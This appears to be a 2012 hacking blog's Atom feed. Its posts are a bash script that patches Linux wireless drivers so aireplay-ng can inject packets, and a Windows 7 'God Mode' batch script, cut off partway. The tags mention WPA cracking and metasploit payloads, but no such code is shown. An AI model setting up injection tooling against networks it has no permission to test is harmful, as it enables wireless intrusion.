<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-7020948317530945898</id><updated>2012-01-18T21:59:42.788-05:00</updated><category term='aireplay-ng'/><category term='Learning Commandline'/><category term='cryptography'/><category term='Noscript'/><category term='installing'/><category term='disable vibrant'/><category term='fhide'/><category term='decrypt'/><category term='channel -1'/><category term='one-liner'/><category term='genpmk'/><category term='IT'/><category term='reverse engineering'/><category term='hacking'/><category term='Fix'/><category term='No Sound'/><category term='Rainbow Tables'/><category term='God Mode'/><category term='WPA2'/><category term='module'/><category term='encryption'/><category term='2wire'/><category term='Flash'/><category term='mon0'/><category term='Password Reset'/><category term='ShowIP'/><category term='disabling vibrant'/><category term='aireplay'/><category term='Batch'/><category term='camouflage'/><category term='Fireshot'/><category term='GodMode'/><category term='Firecookie'/><category term='msfpayload'/><category term='Windows 7'/><category term='FireFox'/><category term='patch'/><category term='router'/><category term='Script'/><category term='Damn Vulnerable Web App'/><category term='reveal'/><category term='backdoor'/><category term='WPA'/><category term='security'/><category term='Cracking'/><category term='msfencode'/><category term='Troubleshooting'/><category term='Free Hide Folder'/><category term='cleanersoft'/><category term='ubuntu 11.10. fix'/><category term='fhide.exe'/><category term='JRE'/><category term='cowpatty 4.6'/><category term='metasploit'/><category term='trojan'/><category term='computers'/><category term='forensics'/><category term='cowpatty'/><category term='disable ads'/><category term='Advance Dork'/><category term='Sun'/><category term='No Script'/><category term='Firebug'/><category term='wireless'/><category term='Linux'/><category term='leetkey'/><category term='DVWA'/><category term='Ubuntu'/><category term='XSS protection'/><category term='Breaking'/><category term='error'/><category term='Tips and Tricks'/><category term='Password Recovery'/><category term='stegano'/><category term='OpenJDK'/><category term='BackTrack'/><title type='text'>The Unl33t</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://theunl33t.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://theunl33t.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>The Unl33t</name><uri>http://www.blogger.com/profile/17211285403285610915</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_mJgRowKkfO8/Sx1rna_mfxI/AAAAAAAAADM/xeeVOgHj1PE/S220/myself.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>17</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-7020948317530945898.post-2520781875382098885</id><published>2012-01-18T19:25:00.025-05:00</published><updated>2012-01-18T21:26:45.090-05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='aireplay'/><category scheme='http://www.blogger.com/atom/ns#' term='computers'/><category scheme='http://www.blogger.com/atom/ns#' term='Script'/><category scheme='http://www.blogger.com/atom/ns#' term='aireplay-ng'/><category scheme='http://www.blogger.com/atom/ns#' term='error'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='wireless'/><category scheme='http://www.blogger.com/atom/ns#' term='patch'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><category scheme='http://www.blogger.com/atom/ns#' term='channel -1'/><category scheme='http://www.blogger.com/atom/ns#' term='ubuntu 11.10. fix'/><category scheme='http://www.blogger.com/atom/ns#' term='Linux'/><category scheme='http://www.blogger.com/atom/ns#' term='mon0'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Ubuntu 11.10, aireplay-ng, and the "mon0 is on channel -1" error and how to fix it - shell script included</title><content type='html'>I had recently upgrade my Ubuntu install to 11.10. Along with other annoyances I came across I ran into a bit of a deal breaker when I went to run aireplay-ng. I was getting the following error:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="  font-weight: bold;font-family:Verdana,sans-serif;font-size:small;"  &gt;&lt;i&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;blockquote&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="  font-weight: bold;font-family:Verdana,sans-serif;font-size:small;"  &gt;&lt;i&gt;mon0 is on channel -1, but the AP uses channel [#]&lt;br /&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;This was going to be a huge problem since I know that my ZyDAS 1211 chip set was compatible with packet injection. After searching around for a bit I found a great solution from this site &lt;a href="http://linux-software-news-tutorials.blogspot.com/2011/06/solve-error-mon0-is-on-channel-1-but-ap.html"&gt;here&lt;/a&gt; about the drivers and how to patch and reinstall the older ones back in. Below I have a script that you can run to get that installed.&lt;span style=";font-family:Verdana,sans-serif;font-size:small;"  &gt;&lt;i&gt;&lt;br /&gt;&lt;br /&gt;&lt;/i&gt;&lt;/span&gt;&lt;a title="Driver Patcher in action. (Click for full size image)" href="http://2.bp.blogspot.com/-CxRcKxevyxw/Txd8o4CVFzI/AAAAAAAAADM/HS5CrQpdFGA/s1600/Ubuntu_patch_driver_installer_script_01-18-2012.png"&gt;&lt;img style="text-align:center; cursor:hand;" src="http://2.bp.blogspot.com/-CxRcKxevyxw/Txd8o4CVFzI/AAAAAAAAADM/HS5CrQpdFGA/s600/Ubuntu_patch_driver_installer_script_01-18-2012.png" alt="Driver Patcher in action." id="BLOGGER_PHOTO_ID_5699160895139419954" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style=" ;font-family:Verdana,sans-serif;font-size:small;"  &gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/span&gt;==================================================================&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;#!/bin/bash&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;#&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;# This fix was found at:&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;# http://linux-software-news-tutorials.blogspot.com/2011/06/solve-error-mon0-is-on-channel-1-but-ap.html&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;#&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;# If this script helps you be sure to drop him a line and&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;# say thanks!&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo -e "\n\033[1;32m###########################################"&lt;/span&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;br /&gt;echo -e "# Ubuntu Patched Drivers Installer Script #"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo -e "#    Tested on Ubuntu 11.04 and 11.10     #"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo -e "###########################################"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo " Coded By: Travis Phillips"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo "     Date: 01/18/2012"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo "  Website: http://theunl33t.blogspot.com"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo -e -n "\n[*] Installing build-essential...\033[0m"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;sudo apt-get -y install build-essential &amp;amp;&amp;gt; /dev/null&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo -e "\033[1;32mDone!"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo -e -n "\n[*] Downloading Wireless Drivers...\033[0m"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2011-06-16.tar.bz2 &amp;amp;&amp;gt; /dev/null&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo -e "\033[1;32mDone!"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo -e -n "\n[*] Extracting...\033[0m"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;tar -jxf compat-wireless-2011-06-16.tar.bz2&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;cd compat-wireless-2011-06-16&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo -e "\033[1;32mDone!"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo -e -n "\n[*] Downloading Patches...\033[0m"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch &amp;amp;&amp;gt;12 /dev/null&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch &amp;amp;&amp;gt;12 /dev/null&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo -e "\033[1;32mDone!"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo -e -n "\n[*] Applying Patches...\033[0m"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;patch -p1 &amp;lt; mac80211.compat08082009.wl_frag+ack_v1.patch &amp;amp;&amp;gt; /dev/null&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;patch ./net/wireless/chan.c channel-negative-one-maxim.patch &amp;amp;&amp;gt; /dev/null&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo -e "\033[1;32mDone!"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo -e "\n[*] Building patched drivers and installing."&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo -e "\n\t\033[31mTHIS WILL TAKE ABOUT 5-10 mins..."&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo -e "\tPlease be patient and do *NOT* interrupt this process\033[0m\n"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;make &amp;amp;&amp;gt; /dev/null&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo -e "\t \033[1;32m[*] Compiling Complete. Installing Drivers...\033[0m\n"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;sudo make install &amp;amp;&amp;gt; /dev/null&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo -e "\033[1;32m[*] Installing Patched drivers completed!"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo -e -n "\n[*] Cleaning Up...\033[0m"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;cd ..&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;rm compat-wireless-2011-06-16.tar.bz2&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;rm -rf compat-wireless-2011-06-16&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo -e "\033[1;32mDone!"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;echo -e "\n\n\t\t[*] \033[1;37mScript Finished! Please reboot to finish the patch.\033[0m\n\n"&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;==================================================================&lt;br /&gt;&lt;br /&gt;To run save it to a save to a file called patchwifidrivers.sh and  in a terminal type&lt;br /&gt;&lt;br /&gt;&lt;blockquote style="color: rgb(0, 0, 0);"&gt;chmod +x patchwifidrivers.sh&lt;br /&gt;./patchwifidrivers.sh&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Hope this helps some people.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7020948317530945898-2520781875382098885?l=theunl33t.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/2520781875382098885'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/2520781875382098885'/><link rel='alternate' type='text/html' href='http://theunl33t.blogspot.com/2012/01/ubuntu-1110-aireplay-ng-and-mon0-is-on.html' title='Ubuntu 11.10, aireplay-ng, and the &quot;mon0 is on channel -1&quot; error and how to fix it - shell script included'/><author><name>Travis Phillips</name><uri>http://www.blogger.com/profile/03109495184286865658</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='31' height='23' src='http://3.bp.blogspot.com/-47yG5MEgHcA/TxeD0WkkJxI/AAAAAAAAAEY/LGlRR6bwwpc/s220/33777_454923994603_707019603_5193965_7985624_n1.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-CxRcKxevyxw/Txd8o4CVFzI/AAAAAAAAADM/HS5CrQpdFGA/s72-c/Ubuntu_patch_driver_installer_script_01-18-2012.png' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-7020948317530945898.post-415974650402455457</id><published>2011-10-03T21:20:00.012-04:00</published><updated>2011-10-03T22:30:32.059-04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='reveal'/><category scheme='http://www.blogger.com/atom/ns#' term='Batch'/><category scheme='http://www.blogger.com/atom/ns#' term='Script'/><category scheme='http://www.blogger.com/atom/ns#' term='computers'/><category scheme='http://www.blogger.com/atom/ns#' term='Fix'/><category scheme='http://www.blogger.com/atom/ns#' term='backdoor'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows 7'/><category scheme='http://www.blogger.com/atom/ns#' term='Tips and Tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='IT'/><category scheme='http://www.blogger.com/atom/ns#' term='God Mode'/><category scheme='http://www.blogger.com/atom/ns#' term='GodMode'/><title type='text'>The Many Faces Of God Mode In Windows 7 - With Script</title><content type='html'>Some of you may already be familiar with "God Mode" in windows 7. It was a special tool which the Windows developer team left for their sake to make enabling and disabling several of Windows functions quick and easy. However there are more than one of these, I have found 39 and will show you how to access them and also provide a script to do that. It should be noted that these are for Windows 7 and will not work on windows XP (although there are some GUID tricks there to, these just aren't them). The default God Mode was to add "&lt;span style="font-family:courier new;"&gt;.{ED7BA470-8E54-465E-825C-99712043E01C}&lt;/span&gt;" to the end of a folder. So for example if you create a folder titled "&lt;span style="font-family:courier new;"&gt;Main GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}&lt;/span&gt;" it would create a folder called "&lt;span style="font-family:courier new;"&gt;Main GodMode&lt;/span&gt;" which when double-clicked would give you what you see below instead of an empty folder.&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;a title="God Mode folder View (click for full size image)" href="http://1.bp.blogspot.com/-37iFJWBsn6Q/TophB3elTnI/AAAAAAAAACA/jQktO8bTsxc/s1600/GodMode.png"&gt;&lt;img style="cursor:hand;" src="http://1.bp.blogspot.com/-37iFJWBsn6Q/TophB3elTnI/AAAAAAAAACA/jQktO8bTsxc/s900/GodMode.png" alt="God Mode folder View" id="BLOGGER_PHOTO_ID_5659442566444437106" border="0" /&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;However, this is just another parlor trick by the windows explorer. Looking at it from the command line and you will see it's still just a folder, But windows handles it differently.&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;a title="CMD view of the folder (click for full size image)" href="http://4.bp.blogspot.com/-WLACRGlRuBk/TopjY7TIYgI/AAAAAAAAACI/cbdxg4gO_a8/s1600/GodMode2.png"&gt;&lt;img style="cursor:hand;" src="http://4.bp.blogspot.com/-WLACRGlRuBk/TopjY7TIYgI/AAAAAAAAACI/cbdxg4gO_a8/s800/GodMode2.png" alt="CMD view of the folder" id="BLOGGER_PHOTO_ID_5659445161630392834" border="0" /&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;Looking into the Windows Registry, you can see it is actually accessing a DLL Function in the shell32.dll file in the system32 folder.&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;a title="Registry view of HKEY_CLASSES_ROOT\CLSID\{ED7BA470-8E54-465E-825C-99712043E01C} (click for full size image)" href="http://1.bp.blogspot.com/-hVPKtHApVDs/TopoD5S53DI/AAAAAAAAACQ/GzjwWNZ2KSM/s1600/GodMode2a.png"&gt;&lt;img style="cursor:hand;" src="http://1.bp.blogspot.com/-hVPKtHApVDs/TopoD5S53DI/AAAAAAAAACQ/GzjwWNZ2KSM/s600/GodMode2a.png" alt="Registry view of HKEY_CLASSES_ROOT\CLSID\{ED7BA470-8E54-465E-825C-99712043E01C}" id="BLOGGER_PHOTO_ID_5659450297873456178" border="0" /&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;With some searching I was able to create a batch file script that will create these "Modules". The script will create a folder in where every it is run called "GodModes" then create 39 known God Mode folders under it for you to use, which gives you a decent "this is what the Control Panel should have been" Folder.&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;a title="View of the GodMode Folder from the script. (click for full size image)" href="http://1.bp.blogspot.com/-kq5w64hLoEk/Topo_oxuQ4I/AAAAAAAAACY/MJSMbtFYKP0/s1600/GodMode4.png"&gt;&lt;img style="cursor:hand;" src="http://1.bp.blogspot.com/-kq5w64hLoEk/Topo_oxuQ4I/AAAAAAAAACY/MJSMbtFYKP0/s600/GodMode4.png" alt="View of the GodMode Folder from the script." id="BLOGGER_PHOTO_ID_5659451324231467906" border="0" /&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;Without further delay. Here is the script.&lt;br /&gt;==================================================================&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0); font-weight: bold;"&gt;@&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; off&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;rem \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;rem \\ this script will create a folder in it's     \\&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;rem \\ Current Directory called GodModes and then   \\&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;rem \\ create several "God Mode folders under it    \\&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;rem \\ Which in Windows vista\7 will trigger some   \\&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;rem \\ Control Panel as well as hidden functions    \\&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;rem \\ Hidden in some of windows system DLLs.       \\&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;rem \\                                              \\&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;rem \\ Note: Some of these do NOT work on vista.    \\&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;rem \\ For Those it will just show a folder.        \\&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;rem \\ Also one of these only works on win7 Ultimate\\&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;rem \\ Which is the BitLocker Module                \\&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;rem \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;  ***********************************************&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;       Enable Windows 7 God Mode Modules v1.0&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;  ***********************************************&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;          Coded By: Travis Phillips&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;                on: 10/03/2011&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating folder .\GodMode&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "GodModes"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Changing to .\GodMode&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;cd&lt;/span&gt; GodModes&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Default Geolocation"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Default Geolocation.{00C6D95F-329C-409a-81D7-C46C66EA7F33}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Biometrics"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Biometrics.{0142e4d0-fb7a-11dc-ba4a-000ffe7ab428}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Power Plan"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Power Plan.{025A5937-A6BE-4686-A844-36FE4BEC8B6D}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Personalization Control Panel"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Personalization Control Panel.{ED834ED6-4B5A-4bfe-8F11-A626DCB6A921}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Taskbar Notitification Area"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Taskbar Notitification Area.{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Administration Tools"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Administration Tools.{D20EA4E1-3957-11d2-A40B-0C5020524153}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode " Windows Vault (Credential Manager - Auto Logon)"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Windows Vault (auto logon).{1206F5F1-0569-412C-8FEC-3204630DFB70}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Ease of Access"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Ease of Access.{D555645E-D4F8-4c29-A827-D93C859C4F2A}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Install Program from the Network"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Install Program from the Network.{15eae92e-f17a-4431-9f28-805e482dafd4}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Network Map"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Network Map.{E7DE9B1A-7533-4556-9484-B26FB486475E}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Default Programs"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Default Programs.{17cd9488-1228-4b2f-88ce-4298e93e0966}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Windows SideShow"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Windows SideShow.{E95A4861-D57A-4be1-AD0F-35267E261739}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "DOT NET Framework Modules"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "DOT NET Framework Modules.{1D2680C9-0E2A-469d-B787-065558BC7D43}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "GPS Sensors"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "GPS Sensors.{E9950154-C418-419e-A90A-20C5287AE24B}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Manage Wireless Networks"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Manage Wireless Networks.{1FA9085F-25A2-489B-85D4-86326EEDCD87}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Network"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Network.{208D2C60-3AEA-1069-A2D7-08002B30309D}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "My Computer"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "My Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Computers and Devices"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Computers and Devices.{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 